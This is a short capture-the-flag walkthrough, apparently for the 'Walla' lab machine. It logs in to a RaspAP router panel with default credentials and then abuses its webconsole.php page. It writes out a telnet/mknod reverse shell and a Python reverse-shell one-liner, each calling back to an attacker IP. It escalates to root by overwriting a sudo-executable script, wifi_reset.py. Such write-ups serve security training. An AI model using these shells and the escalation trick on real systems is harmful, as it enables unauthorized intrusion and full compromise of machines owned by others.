🐧Walla
Nmap
sudo nmap 192.168.233.97 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open tcpwrapped
422/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8091/tcp open http lighttpd 1.4.53
42042/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Service Info: Host: walla; OS: Linux; CPE: cpe:/o:linux:linux_kernelConnecting to port 8091 asks for credentials for "RaspAP". Which is Debian-based software for wireless routers.
Looking up the default credentials we can log in with admin:secret.
Checking the settings we are running version 2.5. PoC exists here:https://raw.githubusercontent.com/lb0x/cve-2020-24572/master/raspap_pwn.py. However, I was unable to get code execution from this.
Looking at the exploit code we can see it is trying to interact with webconsole.php
We can manually browse this at: http://192.168.233.97:8091/includes/webconsole.php.
This along with telnet running on the target machine we can obtain a good reverse shell:
mknod a p && telnet 192.168.49.233 443 0<a | /bin/sh 1>a
Running linpeas.sh on the target reveals the following interesting information:
As www-data we can delete the file /home/walter/wifi_reset.py and replace it with a Python reverse shell of the same name:
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.233",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' > /home/walter/wifi_reset.pyThen execute with sudo as root:
sudo /usr/bin/python /home/walter/wifi_reset.py
Last updated